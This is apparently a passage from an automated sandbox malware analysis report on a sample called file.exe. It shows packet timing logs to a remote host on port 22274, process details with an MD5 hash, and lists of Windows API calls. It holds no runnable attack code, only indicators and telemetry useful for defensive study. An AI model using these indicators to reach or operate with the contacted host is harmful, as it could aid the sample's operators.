                                                Jun 28, 2023 01:59:23.037952900 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038008928 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038094044 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038135052 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038161993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038180113 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038192987 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038220882 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038247108 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038254976 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038280964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038322926 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038420916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038460970 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038495064 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038497925 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038527012 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038530111 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038551092 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038594007 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038631916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038716078 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038738012 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038798094 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038800955 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038876057 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038902998 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038934946 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038968086 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038994074 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039021015 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039088964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039098978 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039129972 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039189100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039189100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039221048 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039302111 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039349079 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039422035 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039434910 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039508104 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039567947 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039602995 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039638042 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039661884 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039661884 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039666891 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039704084 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039731026 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039840937 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039871931 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039910078 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039910078 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039942980 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039943933 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039968014 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039978981 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040002108 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040011883 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040043116 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040080070 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040194988 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040230036 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040294886 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040296078 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040338039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040366888 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040395975 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040409088 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040448904 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040448904 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040489912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040564060 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040582895 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040612936 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040641069 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040647030 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040673971 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040699005 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040728092 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040792942 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040808916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040900946 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040909052 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040927887 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040975094 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040976048 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041096926 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041136026 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041168928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041178942 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041197062 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041218996 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041218996 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041258097 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041259050 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041320086 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041400909 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041444063 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041526079 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041539907 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041579962 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041604042 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041615009 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041645050 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041681051 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041707039 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070357084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070389032 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070416927 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070440054 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070502043 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070502043 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070502996 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070532084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070614100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070664883 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070732117 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070741892 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070810080 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070837975 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070863008 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070921898 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070936918 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070962906 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071005106 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071053028 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071079016 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071125031 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071125031 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071218014 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071288109 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071289062 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071314096 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071352005 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071377993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071424961 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071449041 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071489096 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071489096 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071517944 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071522951 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071584940 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071655035 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071731091 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071758032 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071821928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071824074 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071887016 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072191954 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072228909 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072298050 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072304964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072304964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072323084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072346926 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072357893 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072371960 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072400093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072400093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072432995 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072479010 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072550058 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072685957 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072709084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072767973 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072767973 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072921038 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072943926 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073016882 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073016882 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073185921 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073260069 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073287964 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073354959 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073743105 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073829889 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074115992 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074191093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074450970 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074521065 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074553967 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074613094 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074850082 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074932098 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075119972 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075145960 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075189114 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075247049 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075414896 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075439930 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075490952 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075490952 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075519085 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075582027 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075627089 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075690985 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075731039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075793028 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076035023 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076093912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076100111 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076119900 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076162100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076189995 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076196909 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076256990 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076328039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076499939 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076602936 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076627970 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076863050 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076889038 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077073097 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077239990 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077321053 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077446938 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078340054 CEST22274969289.238.170.240192.168.2.4


                                                Target ID:0
                                                Start time:01:58:58
                                                Start date:28/06/2023
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\file.exe
                                                Imagebase:0x6f0000
                                                File size:535'040 bytes
                                                MD5 hash:CCBBA2AAC1CAE3A0BD29CB42203E20B4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:low

                                                Target ID:3
                                                Start time:01:59:06
                                                Start date:28/06/2023
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\file.exe
                                                Imagebase:0x8d0000
                                                File size:535'040 bytes
                                                MD5 hash:CCBBA2AAC1CAE3A0BD29CB42203E20B4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low


                                                  Execution Graph

                                                  Execution Coverage:10.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:115
                                                  Total number of Limit Nodes:4

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2cd1c6a523da46ba03447f80d327a1a87e56fc64dd0ca03bf4300e9a3337a377
                                                  • Instruction ID: 268dfd71376f2e51dfa2ffc423d2f269f96e06fbc2f839442644a0985c4bd504
                                                  • Opcode Fuzzy Hash: 2cd1c6a523da46ba03447f80d327a1a87e56fc64dd0ca03bf4300e9a3337a377
                                                  • Instruction Fuzzy Hash: 549175B1C043899FDB11CFAAC880ADEBFF5EF59314F25819AE444AB212C7749885CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A99976
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: ea7e3d1af471bee36edced2ef5e954f3305796711ef17822976b1c3c71c3b137
                                                  • Instruction ID: e5d1fef1a2d605dffb917b7dc9edf2e4e4a8adf03abb28ac15ae810d1f4879d0
                                                  • Opcode Fuzzy Hash: ea7e3d1af471bee36edced2ef5e954f3305796711ef17822976b1c3c71c3b137
                                                  • Instruction Fuzzy Hash: 447113B0A00B069FDB64DF6AD18075BBBF1BF88304F10892ED45ADBA50DB75E9058F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FEAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FEAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FEAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02A95421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02A95421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9B91E,?,?,?,?,?), ref: 02A9B9DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9B91E,?,?,?,?,?), ref: 02A9B9DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9B91E,?,?,?,?,?), ref: 02A9B9DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A999F1,00000800,00000000,00000000), ref: 02A99C02
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A999F1,00000800,00000000,00000000), ref: 02A99C02
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered graph not reproduced; the API calls it contains are listed under APIs)
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A99976
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

